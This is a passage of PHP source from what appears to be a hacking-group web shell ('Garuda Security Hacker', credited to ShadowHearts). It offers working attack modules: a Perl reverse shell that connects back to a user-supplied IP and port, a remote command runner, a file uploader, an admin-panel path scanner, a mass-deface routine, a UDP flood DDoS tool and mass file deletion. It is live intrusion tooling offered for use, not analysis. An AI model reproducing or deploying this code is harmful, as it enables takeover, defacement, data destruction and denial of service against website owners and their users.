  734. break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
  735. break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
  736. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  737. break;case 'urlencode' : $codi=rawurldecode($text);
  738. break;case 'hexencode' : $codi=quoted_printable_decode($text);
  739. break;case 'ur' : $codi=convert_uudecode($text);
  740. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  741. break;default:break;}}
  742. $html = htmlentities(stripslashes($codi));
  743. echo "<from><center><h3><font size=4 face=chiller color=aqua>Garuda Security Hacker</h3></center><textarea cols=70 rows=20 style='onfocus();font-weight:bold;color:red;background-image: transparent;opacity:0.40;background-size:100%;background-repeat: no-repeat;' class='inputz' readonly>".$html."</textarea><BR/><BR/></center></from>";
  744. ?>
  745. <footer style="text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000; position:fixed; left:1px; right:0px; top:0px; border-bottom: 1px solid red ;">
  746. <center><b><font face="Quicksand" color="black" size="3" style="text-shadow: 0 0 5px #2f2b2b, 0 0 10px #2f2b2b, 0 0 20px #2f2b2b, 0 0 45px #2f2b2b, 0 0 40px #2f2b2b;">
  747. <font face="Agency FB" color="red" size="4" style="text-shadow: 0 0 6px black, 0 0 5px black, 0 0 5px black;"></footer>
  748. <?php
  749.     } elseif($_GET['do'] == 'shellscanner') {
  750. ?>
  751. <script language="JavaScript" type="text/JavaScript">
  752. <!--
  753. function MM_openBrWindow(theURL,winName,features) { //v2.0
  754.   window.open(theURL,winName,features)
  755. }
  756. //-->
  757. </script>
  758. <style type="text/css">
  759. <!--
  760. .single{
  761.    border: 1px solid #00ff00;box-shadow: 0px 0px 15px #55FF55;
  762.    padding: 5px;
  763. }
  764. .me  {
  765.    font-size:11px; font-family:Tahoma,Verdana,Arial; color:#ccff99;
  766.    border: 0px;
  767.    padding: 5px;
  768. }
  769.  
  770. .isi{
  771.    padding: 2px;
  772.    border:1px solid #666666;
  773.    font-family: Tahoma;
  774.    color: #ccff99;
  775.    background-color: #666666;
  776.    font-size: 10px;
  777.    font-weight: bold;
  778. }
  779. -->
  780. </style>
  781. <style type="text/css">
  782. #patch {position:absolute; height:1; width:1px; top:0; left:0;}
  783. </style>
  784. </head>
  785. <body>
  786. <center>
  787. <img src="http://i1159.photobucket.com/albums/p622/dvildance/aSSD_zps055e1ce7.gif">
  788. <center><font color="#339900" size="14" face="arial">Backdoor Scanner</font></center><br>
  789. <?php
  790. if(isset($_REQUEST['edit']) && $_REQUEST['edit']=='file'){
  791.    if(isset($_POST['yes'])){
  792.       $filename = $_GET['file'];
  793.       echo "<br><br><br><font color=red size=3><b><center>".$filename." deleted...</b></font><br><br><br><br><br><br><br>";
  794.       unlink($filename);
  795.       echo "<META HTTP-EQUIV=Refresh CONTENT=\"2; URL=javascript:window.close();\">";
  796.    }else{
  797.       if($_POST['update']) {
  798.          $filename = $_POST['file'];
  799.          if(is_writable($filename)) {
  800.             $handle = fopen($filename, "w+");
  801.             $isi=$_POST['content'];
  802.             fwrite($handle, stripslashes($isi));
  803.             fclose($handle);
  804.             $stat= "<center><strong>edited successfully<br>";
  805.          } else {
  806.             $stat= "<center><font color=red><strong>Error! File may not be writable.</font></center>";
  807.          }
  808.       }
  809.       if($_POST['close']) {
  810.          echo "<META HTTP-EQUIV=Refresh CONTENT=\"0; URL=javascript:window.close();\">";
  811.       }
  812.       $filename = $_GET['file'];
  813.       if (file_exists($filename)){
  814.          $vuln = $_GET['bug'];
  815.          $handle = fopen($filename, "r");
  816.          $contents = fread($handle, filesize($filename));
  817.       ?>
  818.       <center>
  819.       <table>
  820.          <tr><td align="left" class="me"><strong><?=$filename?>&nbsp;&nbsp;>> Contains :&nbsp;<?=$vuln?></strong></td></tr>
  821.          <tr><td class="me">
  822.             <form method="post" action="">
  823.             <input type="hidden" name="file" value="<?=$filename?>">
  824.             <textarea name="content" cols="80" rows="15"><?=htmlspecialchars($contents)?></textarea><br>
  825.          </td></tr>
  826.          <tr><td align="center" class="me">
  827.          <?php
  828.          if($_POST['delete']) {
  829.             echo "Are you sure to delete ".$filename." ?";
  830.          ?>
  831.          <tr><td align="center" class="me">
  832.             <input type="submit" name="yes" value=" Y E S ">
  833.             <input type="submit" name="no" value=" N O ">
  834.          </td></tr>
  835.          <?php
  836.          }else{
  837.          echo $stat;
  838.          ?>
  839.          </td></tr>
  840.          <tr><td align="right" class="me">
  841.             <input type="submit" name="close" value=" C l o s e ">
  842.             <input type="submit" name="delete" value=" D e l e t e ">
  843.             <input type="submit" name="update" value=" S a v e ">
  844.          </td></tr>
  845.          <?php
  846.          }
  847.          fclose($handle);
  848.          ?>
  849.       </table>
  850. </form>
  851. <?php
  852. }else{
  853. echo "<br><br><br><font color=red size=3><b><center>".$filename." not exist...</b></font><br><br><br><br><br><br><br>";
  854. echo "<META HTTP-EQUIV=Refresh CONTENT=\"4; URL=javascript:window.close();\">";
  855. }
  856. ?>
  857. </center>
  858. <?php
  859. }
  860. }elseif(isset($_POST['Submit'])){
  861.    $ceks = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
  862.    foreach($ceks as $ceker){
  863.       if($_POST[$ceker]<>""){
  864.          $six.=$_POST[$ceker].".";
  865.       }
  866.    }
  867.    
  868. $cek = explode('.', $six);
  869.  
  870. function ListFiles($dir) {
  871.     if($dh = opendir($dir)) {
  872.  
  873.         $files = Array();
  874.         $inner_files = Array();
  875.  
  876.         while($file = readdir($dh)) {
  877.             if($file != "." && $file != "..") {
  878.                 if(is_dir($dir . "/" . $file)) {
  879.                     $inner_files = ListFiles($dir . "/" . $file);
  880.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  881.                 } else {
  882.                     array_push($files, $dir . "/" . $file);
  883.                 }
  884.             }
  885.         }
  886.  
  887.         closedir($dh);
  888.         return $files;
  889.     }
  890. }
  891.    ?>
  892.    <center>
  893.    <table border="0" width="90%" cellpadding="5">
  894.       <tr>
  895.          <td align="right" width="30"><b>No</b></td>
  896.          <td align="center" width="105"><b> T y p e </b></td>
  897.          <td align="center"><b> F i l e&nbsp;&nbsp;L o c a t i o n </b></td>
  898.          <td align="center" width="150"><b> L a s t&nbsp;&nbsp;E d i t </b></td>
  899.          <td  align="right" width="80"><b>F i l e&nbsp;&nbsp;S i z e</b></td>
  900.       </tr><br>
  901. <?php
  902. $target=$_SERVER['DOCUMENT_ROOT'];
  903.    foreach (ListFiles($target) as $key=>$file){
  904.       $nFile = substr($file, -4, 4);
  905.       if($nFile == ".php"){
  906.          if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']){
  907.          }else{
  908.             $ops = @file_get_contents($file);
  909.             $op=strtolower($ops);
  910.             $arr = array('c99_buff_prepare' => 'c 9 9',
  911.                       'abcr57' => 'r 5 7');
  912.             $sis=0;
  913.             if($op)
  914.             $size=filesize($file);
  915.  
  916.             $last=date("M-d-Y H:i", $last_modified);
  917.             foreach($arr as $key => $val) {
  918.                if(@preg_match("/$key/", $op)) {
  919.                   $sis=1;
  920.                   $i++;
  921.                   ?>
  922.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  923.                      <td align="right"><font color="red"><blink><?=$i?></blink></font></td>
  924.                      <td align="center"><font color="red"><blink><?=$val?></blink></font></td>
  925.                      <td align="left"><blink>
  926.                      <a href="#" class="abunai" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  927.                      </blink></td>
  928.                      <td align="center"><font color="red"><blink><?=$last?> GMT+9</blink></font></td>
  929.                      <td align="right"><font color="red"><blink><?=$size?> byte</blink></font></td>
  930.                      <script language="javascript">
  931.                         var bgcolor = "transparent";
  932.                         var change_color = "#444444"
  933.                         function mover(aa) {
  934.                            aa.style.backgroundColor = change_color;
  935.                         }
  936.                         function mout(aa) {
  937.                            aa.style.backgroundColor = bgcolor;
  938.                         }
  939.                      </script>
  940.                   </tr>
  941.                   <?php
  942.                }
  943.             }
  944.             if($sis<>"1"){
  945.                if((@preg_match("/system\((.*?)\)/", $op))&&(@preg_match("/<pre>/", $op))&&(@preg_match("/empty\((.*?)\)/", $op))) {
  946.                   $sis="2";
  947.                   $i++;
  948.                   $val="hidden shell";
  949.                   ?>
  950.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  951.                      <td align="right"><font color="blue"><?=$i?></font></td>
  952.                      <td align="center"><font color="blue"><?=$val?></font></td>
  953.                      <td align="left">
  954.                      <a href="#" class="xxx" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  955.                      </td>
  956.                      <td align="center"><font color="blue"><?=$last?> GMT+9</font></td>
  957.                      <td align="right"><font color="blue"><?=$size?> byte</font></td>
  958.                      <script language="javascript">
  959.                         var bgcolor = "transparent";
  960.                         var change_color = "#444444"
  961.                         function mover(aa) {
  962.                            aa.style.backgroundColor = change_color;
  963.                         }
  964.                         function mout(aa) {
  965.                            aa.style.backgroundColor = bgcolor;
  966.                         }
  967.                      </script>
  968.                   </tr>
  969.                   <?php
  970.                }
  971.             }
  972.             if($sis=="0"){
  973.             foreach($cek as $bugs) {
  974.                 if ($bugs<>""){
  975.                if(@preg_match("/$bugs\((.*?)\)/", $op)) {
  976.                   $i++;
  977.                   ?>
  978.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  979.                      <td align="right"><?=$i?></td>
  980.                      <td align="center"><?=$bugs?></td>
  981.                      <td align="left">
  982.                      <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$bugs?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  983.                      </td>
  984.                      <td align="center"><?=$last?> GMT+9</td>
  985.                      <td align="right"><?=$size?> byte</td>
  986.                      <script language="javascript">
  987.                         var bgcolor = "transparent";
  988.                         var change_color = "#444444"
  989.                         function mover(aa) {
  990.                            aa.style.backgroundColor = change_color;
  991.                         }
  992.                         function mout(aa) {
  993.                            aa.style.backgroundColor = bgcolor;
  994.                         }
  995.                      </script>
  996.                   </tr>
  997.                   <?php
  998.                }              
  999.             }
  1000.             }
  1001.             }
  1002.             if($_POST['textV']<>""){
  1003.                $text=$_POST['textV'];
  1004.                   if(@preg_match("/$text/", $op)) {
  1005.                   $i++;
  1006.                   ?>
  1007.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  1008.                      <td align="right"><?=$i?></td>
  1009.                      <td align="center"><?=$text?></td>
  1010.                      <td align="left">
  1011.                      <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$text?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  1012.                      </td>
  1013.                      <td align="center"><?=$last?> GMT+9</td>
  1014.                      <td align="right"><?=$size?> byte</td>
  1015.                      <script language="javascript">
  1016.                         var bgcolor = "transparent";
  1017.                         var change_color = "#444444"
  1018.                         function mover(aa) {
  1019.                            aa.style.backgroundColor = change_color;
  1020.                         }
  1021.                         function mout(aa) {
  1022.                            aa.style.backgroundColor = bgcolor;
  1023.                         }
  1024.                      </script>
  1025.                   </tr>
  1026.                   <?php
  1027.                }
  1028.            
  1029.            
  1030.             }
  1031.          }
  1032.       }
  1033.    }
  1034.    if($i==0){
  1035.       foreach($cek as $bugs) {
  1036.          if ($bugs<>""){
  1037.             $x++;
  1038.    ?>
  1039.       <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  1040.          <td align="right"><?=$x?></td>
  1041.          <td align="center"><?=$bugs?></td>
  1042.          <td align="center"> not exist </td>
  1043.          <td align="center"> no record </td>
  1044.          <td align="right"> -&nbsp;&nbsp;&nbsp;&nbsp;byte </td>
  1045.       </tr>
  1046.    <?php
  1047.          }
  1048.       }
  1049.    }
  1050.    ?>
  1051.    </table>
  1052.    <?php
  1053. }else{
  1054.    $find = array('default','base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
  1055. ?>
  1056.    <form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
  1057.    <center>
  1058.    <table class="single" width="400" border="1" -webkit-box-shadow: 0px 0px 15px #55FF55; cellpadding="10">
  1059.    <tr><td class="me"><center>
  1060.      
  1061.       <table class="me" width="200">
  1062.          <tr><td class="me">
  1063.             <script language="javascript">
  1064.                function cekKlik(){  
  1065.                   if (!document.fCheck.cekV.checked)
  1066.                      document.fCheck.textV.disabled=true;  
  1067.                   else
  1068.                      document.fCheck.textV.disabled=false;
  1069.                   if(document.fCheck.cekV.checked){
  1070.                      master = master + 1;
  1071.                   }else{
  1072.                      if(master > 0 ){
  1073.                         master = master - 1;
  1074.                      }else{
  1075.                         master = master;
  1076.                      }
  1077.                   }
  1078.                   if(master != 0){
  1079.                      document.fCheck.Submit.disabled=false;
  1080.                   }else{
  1081.                      document.fCheck.Submit.disabled=true;
  1082.                   }        
  1083.                }    
  1084.             </script>  
  1085.             <?php
  1086.             //dari sini
  1087.             foreach($find as $bug) {
  1088.             ?>
  1089.             <script language="javascript">
  1090.                var master = 0;
  1091.                function checkValue<?=$bug?>(){
  1092.                   if(document.fCheck.<?=$bug?>.checked){
  1093.                      master = master + 1;
  1094.                   }else{
  1095.                      if(master > 0 ){
  1096.                         master = master - 1;
  1097.                      }else{
  1098.                         master = master;
  1099.                      }
  1100.                   }
  1101.                   if(master != 0){
  1102.                      document.fCheck.Submit.disabled=false;
  1103.                   }else{
  1104.                      document.fCheck.Submit.disabled=true;
  1105.                   }  
  1106.                }
  1107.             </script>
  1108.             <input onclick="checkValue<?=$bug?>();" name="<?=$bug?>" type="checkbox" id="<?=$bug?>" value="<?=$bug?>" />&nbsp;<?=$bug?><br>
  1109.             <?php
  1110.             }
  1111.             ?>
  1112.             <input name="cekV" type="checkbox" onClick="cekKlik();" id="cekV" value="cekV">
  1113.             <input class="isi" disabled="disabled" name="textV" value="other key word" onFocus="this.select()" type="text" id="textV">
  1114.             <br><br>
  1115.             <input type="hidden" name="asal" value="abcd">
  1116.             <input disabled="disabled" type="submit" name="Submit" value=" Start " />
  1117.          </td></tr>
  1118.       </table>
  1119.    </td></tr></table>
  1120.    </form>
  1121. <?php
  1122. }
  1123. ?>
  1124. <br><br><hr width="300">
  1125. <?php
  1126.     } elseif($_GET['do'] == 'bconnet') {
  1127.         echo '<div id="login" style="margin-top: 10px; margin-left: 10px;">';
  1128.         echo '<form action="?page=bcon" method="get"><input type="hidden" name="page" value="bcon"/>';
  1129.         echo 'IP:<br><input type="text" name="ip" value="'.getenv("remote_addr").'" style="margin-top: 5px;"/><br><br>';
  1130.         echo 'Port:<input type="submit" value="Connect" style="margin-left: 130px; margin-top: -4px;"/><br><input type="text" name="port" value="666" style="margin-top: 5px;"/>';
  1131.         echo '</form>';
  1132.         echo '</div>';
  1133.         if(isset($_GET['ip']) && isset($_GET['port'])){
  1134.             $ip = $_GET['ip'];
  1135.             $port = $_GET['port'];
  1136.             $bc = fopen("/tmp/bxcon.pl","w");
  1137.             fwrite($bc,'#!/usr/bin/perl
  1138. use Socket;
  1139. $iaddr=inet_aton("'.$ip.'") || die("Error: $!\n");
  1140. $paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n");
  1141. $proto=getprotobyname("tcp");
  1142. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  1143. connect(SOCKET, $paddr) || die("Error: $!\n");
  1144. open(STDIN, ">&SOCKET");
  1145. open(STDOUT, ">&SOCKET");
  1146. open(STDERR, ">&SOCKET");
  1147. system("/bin/sh -i");
  1148. close(STDIN);
  1149. close(STDOUT);
  1150. close(STDERR);');
  1151.             fclose($bc);
  1152.             shell_exec("perl /tmp/bxcon.pl");
  1153.             unlink("/tmp/bxcon.pl");
  1154.         }
  1155.     break;
  1156.  
  1157.  
  1158.  
  1159. echo '</td>
  1160. </tr>
  1161. </table>
  1162. <br><center>xB1N4RYx ~ 2012</center><br>
  1163. </body>
  1164. </html>';
  1165. function rooting()
  1166. {
  1167. echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
  1168. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1169. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1170. if( $_POST['_upl'] == "Upload" ) {
  1171.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
  1172.     else { echo '<b>Basarisiz</b><br><br>'; }
  1173. }
  1174. }
  1175. $x = $_GET["x"];
  1176. Switch($x){
  1177. case "rooting";
  1178.     rooting();
  1179.     break;
  1180.    
  1181.     }
  1182.         } elseif($_GET['do'] == 'about') {
  1183. ?>
  1184. <br>
  1185.     <embed src="http://www.youtube.com/v/j_y3i3EHR7E&amp;autoplay=1&amp;loop=1&amp;playlist=besNDPvEwQw" type="application/x-shockwave-flash" wmode="transparent" height="1"width="1"></embed>
  1186.     <div class="terimakasih">
  1187. <tr><td><center><font color="gold">No body can give you freedom and nobody can give you equality.
  1188.     <br>Jiwa Seorang defacer tetaplah sama :D
  1189.     <br><font color="white"> 12-20-2016 - Tangerang</font></font> <br>Create By ShadowHearts<br>Thanks To: MY Friends, And ALL Garuda Security Hacker.<br>Special Greats To My Keyboard.
  1190. </td></tr>
  1191.  
  1192.  
  1193.     <?php
  1194. } elseif($_GET['do'] == 'csrf') {
  1195. ?>      <html>
  1196. <title>CSRF EXPLOITER ONLINE</title>
  1197. <center><br><br><br><br>
  1198. <font color=red>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
  1199. <center>
  1200. <form method="post">
  1201. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  1202. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  1203. <input type="submit" name="d" value="Lock!">
  1204. </form>
  1205. <?php
  1206. //gak penting
  1207.      @$url = $_POST['url'];
  1208.      @$pf = $_POST['pf'];
  1209.      @$d = $_POST['d'];
  1210. if($d) {
  1211.     //baccod
  1212.    
  1213.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
  1214. }
  1215. ?>
  1216. </form>
  1217. </html>
  1218. <?php
  1219.  
  1220. } elseif($_GET['do'] == 'admf') {
  1221.     ?>
  1222. <type='text/javascript'/></script>
  1223. <style>
  1224. </style>
  1225.  
  1226. </head>
  1227. <link rel="SHORTCUT ICON"  href="http://i.imgur.com/2Koa43H.png">
  1228. </style>
  1229. <br>
  1230. <br>
  1231. <br>
  1232. <td width=100% id=Gretz>
  1233. <form action="" method="post">
  1234. <center><p class="frontboxtext"><input name="hash_lol" class="textbox" type="text" size="30" value="http://www.target.co.il/"/>
  1235. <input name="submit_lol" class="textbox" value="Submit Site" type="submit">
  1236. </form>
  1237. <?php
  1238. set_time_limit(0);
  1239.  
  1240. if (isset($_POST["submit_lol"])) {
  1241. $url = $_POST['hash_lol'];
  1242. echo "<br />Crot ".$url."<br /><br />";
  1243.  
  1244. $adminlocales = array("-adminweb/","!adminweb/","@adminweb/","adminweb121/","adminweb90/","adminweb145/","khususadmin/","rahasiaadm/","adminweb123123/","adminweb2222/","adminlanel/","adminlanel.php/","monitor123.php/","masuk.php/","css.php/", "admin1235.php/", "master.php/","1admin/","123admin/","addmin/","home.php","css/","rediect.php/","masuk.php/","index.php/","webpaneladmin123/","registeradm/","register/","member123/","123adminweb/","123paneladminweb/","panelauth1231/","loginadminweb21/","loginadminweb123/","loginadminweb/","webadmin123/","redakturadmin/","paneladminweb/","admloginadm/","4dm1n/","admin12345/","adminweb12/","adminweb111/","adminweb123/","adminweb1/","gangmasuk/","gangadmin/","admredaktur/","adminwebredaktur/","adminredaktur/","adm/", "_adm_/", "_admin_/", "_loginadm_/", "_login_admin_/", "minmin", "loginadmin3/",  "masuk/admin", "webmail", "_loginadmin_/", "_login_admin.php_/", "_admin_/", "_administrator_/", "operator/", "sika/", "adminweb/", "develop/", "ketua/", "redaktur/", "author/", "admin/", "administrator/", "adminweb/", "user/", "users/", "dinkesadmin/", "retel/", "author/", "panel/", "paneladmin/", "panellogin/", "redaksi/", "cp-admin/", "login@web/", "admin1/", "admin2/", "admin3/", "admin4/", "admin5/", "admin6/", "admin7", "admin8", "admin9", "admin10", "master/", "master/index.php", "master/login.php", "operator/index.php", "sika/index.php", "develop/index.php", "ketua/index.php","redaktur/index.php", "admin/index.php", "administrator/index.php", "adminweb/index.php", "user/index.php", "users/index.php", "dinkesadmin/index.php", "retel/index.php", "author/index.php", "panel/index.php", "paneladmin/index.php", "panellogin/index.php", "redaksi/index.php", "cp-admin/index.php", "operator/login.php", "sika/login.php", "develop/login.php", "ketua/login.php", "redaktur/login.php", "admin/login.php", "administrator/login.php", "adminweb/login.php", "user/login.php", "users/login.php", "dinkesadmin/login.php", "retel/login.php", "author/login.php", "panel/login.php", "paneladmin/login.php", "panellogin/login.php", "redaksi/login.php", "cp-admin/login.php", "terasadmin/", "terasadmin/index.php", "terasadmin/login.php", "rahasia/", "rahasia/index.php", "rahasia/admin.php", "rahasia/login.php", "dinkesadmin/", "dinkesadmin/login.php", "adminpmb/", "adminpmb/index.php", "adminpmb/login.php", "system/", "system/index.php", "system/login.php", "webadmin/", "webadmin/index.php", "webadmin/login.php", "wpanel/", "wpanel/index.php", "wpanel/login.php", "adminpanel/index.php", "adminpanel/", "adminpanel/login.php", "adminkec/", "adminkec/index.php", "adminkec/login.php", "admindesa/", "admindesa/index.php", "admindesa/login.php", "adminkota/", "adminkota/index.php", "adminkota/login.php", "admin123/", "admin123/index.php", "dologin/", "home.asp/","supervise/amdin", "relogin/adm", "checkuser", "relogin.php", "relogin.asp", "wp-admin", "registration", "suvervise", "superman.php", "member.php","home/admin","po-admin/","do_login.php", "bo-login", "bo_login.php/", "index.php/admin", "admiiin.php", "masuk/adm","website_login/", "dashboard/admin", "dashboard.php", "dashboard_adm", "admin123/login.php", "logout1/", "logout/","pengelola/login", "manageradm/", "logout.asp", "manager/adm", "pengelola/web","auth/panel", "logout/index.php", "logout/login.php", "controladm/", "logout/admin.php", "adminweb_setting", "adm/index.asp", "adm.asp", "affiliate.asp", "adm_auth.asp", "memberadmin.asp", "siteadmin/login.asp", "siteadmin/login", "paneldecontrol", "cms/admin", "administracion.php", "/ADMON/", "administrador/", "panelc/", "admincp", "admcp", "cp", "modcp", "moderatorcp", "adminare", "cpanel", "controlpanel");
  1245.  
  1246. foreach ($adminlocales as $admin){
  1247. $headers = get_headers("$url$admin");
  1248. if (eregi('200', $headers[0])) {
  1249.     echo "<a href='$url/$admin'>$url$admin</a> Nemu nih!<br />";
  1250. }
  1251. else {
  1252.     echo "$url$admin Gk ketemu!<br />";
  1253. }
  1254. }
  1255. }  
  1256. } elseif($_GET['do'] == 'cmd') {
  1257.     echo "<form method='post'>
  1258.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  1259.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  1260.     </form>";
  1261.     if($_POST['do_cmd']) {
  1262.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  1263.     }
  1264. } elseif($_GET['do'] == 'mass_deface') {
  1265.     function sabun_massal($dir,$namafile,$isi_script) {
  1266.         if(is_writable($dir)) {
  1267.             $dira = scandir($dir);
  1268.             foreach($dira as $dirb) {
  1269.                 $dirc = "$dir/$dirb";
  1270.                 $lokasi = $dirc.'/'.$namafile;
  1271.                 if($dirb === '.') {
  1272.                     file_put_contents($lokasi, $isi_script);
  1273.                 } elseif($dirb === '..') {
  1274.                     file_put_contents($lokasi, $isi_script);
  1275.                 } else {
  1276.                     if(is_dir($dirc)) {
  1277.                         if(is_writable($dirc)) {
  1278.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  1279.                             file_put_contents($lokasi, $isi_script);
  1280.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  1281.                         }
  1282.                     }
  1283.                 }
  1284.             }
  1285.         }
  1286.     }
  1287.     function sabun_biasa($dir,$namafile,$isi_script) {
  1288.         if(is_writable($dir)) {
  1289.             $dira = scandir($dir);
  1290.             foreach($dira as $dirb) {
  1291.                 $dirc = "$dir/$dirb";
  1292.                 $lokasi = $dirc.'/'.$namafile;
  1293.                 if($dirb === '.') {
  1294.                     file_put_contents($lokasi, $isi_script);
  1295.                 } elseif($dirb === '..') {
  1296.                     file_put_contents($lokasi, $isi_script);
  1297.                 } else {
  1298.                     if(is_dir($dirc)) {
  1299.                         if(is_writable($dirc)) {
  1300.                             echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  1301.                             file_put_contents($lokasi, $isi_script);
  1302.                         }
  1303.                     }
  1304.                 }
  1305.             }
  1306.         }
  1307.     }
  1308.     if($_POST['start']) {
  1309.         if($_POST['tipe_sabun'] == 'mahal') {
  1310.             echo "<div style='margin: 5px auto; padding: 5px'>";
  1311.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1312.             echo "</div>";
  1313.         } elseif($_POST['tipe_sabun'] == 'murah') {
  1314.             echo "<div style='margin: 5px auto; padding: 5px'>";
  1315.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1316.             echo "</div>";
  1317.         }
  1318.     } else {
  1319.     echo "<center>";
  1320.     echo "<form method='post'>
  1321.     <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  1322.     <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  1323.     <font style='text-decoration: underline;'>Folder:</font><br>
  1324.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1325.     <font style='text-decoration: underline;'>Filename:</font><br>
  1326.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  1327.     <font style='text-decoration: underline;'>Index File:</font><br>
  1328.     <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Global Network</textarea><br>
  1329.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1330.     </form></center>";
  1331.     }
  1332. } elseif($_GET['do'] == 'ddos') {
  1333. ?>
  1334. <html>
  1335. <form action=" " method="post">
  1336. <center><br><br><br>
  1337. Your IP: <font color="white"><b><?php echo $my_ip; ?></b></font>&nbsp;(Don't DoS yourself nub)<br><br>
  1338. <table class="tabnet" style="width:333px;padding:0 1px;">
  1339. <th colspan="5">Ddos Tool</th>
  1340. <tr><tr><td>IP Target</td><td>:</td>
  1341. <td><input type="text" class="inputz" name="ip" size="48" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
  1342. </td></tr>
  1343. <tr><td>Time</td><td>:</td>
  1344. <td><input type="text" class="inputz" name="time" size="48" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
  1345. </td></tr>
  1346.  
  1347. <tr><td>Port</td><td>:</td>
  1348. <td><input type="text" class="inputz" name="port" size="48" maxlength="5"  value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
  1349. </td></tr></tr></table></b><br>
  1350. <input type="submit" class="inputzbut" name="fire" value="  Firee !!!   ">
  1351. <br><br>
  1352. <center>
  1353. <font color="white">Seteleh selesai menggunakan tools ini segera refresh browsingmu
  1354. </center>
  1355. </form>
  1356. </center>
  1357. <?php
  1358.     @$submit = $_POST['fire'];
  1359.     if (isset($submit)) {
  1360.         $packets = 0;
  1361.         $ip = $_POST['ip'];
  1362.         $rand = $_POST['port'];
  1363.         set_time_limit(0);
  1364.         ignore_user_abort(FALSE);
  1365.         $exec_time = $_POST['time'];
  1366.         $time = time();
  1367.         print "Flooded: $ip on port $rand <br><br>";
  1368.         $max_time = $time + $exec_time;
  1369.         for ($i = 0;$i < 65535;$i++) {
  1370.             $out.= "X";
  1371.         }
  1372.         while (1) {
  1373.             $packets++;
  1374.             if (time() > $max_time) {
  1375.                 break;
  1376.             }
  1377.             $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  1378.             if ($fp) {
  1379.                 fwrite($fp, $out);
  1380.                 fclose($fp);
  1381.             }
  1382.         }
  1383.         echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s
  1384. ";
  1385.     }  
  1386. } elseif($_GET['do'] == 'mass_delete') {
  1387.     function hapus_massal($dir,$namafile) {
  1388.         if(is_writable($dir)) {
  1389.             $dira = scandir($dir);
  1390.             foreach($dira as $dirb) {
  1391.                 $dirc = "$dir/$dirb";
  1392.                 $lokasi = $dirc.'/'.$namafile;
  1393.                 if($dirb === '.') {
  1394.                     if(file_exists("$dir/$namafile")) {
  1395.                         unlink("$dir/$namafile");
  1396.                     }
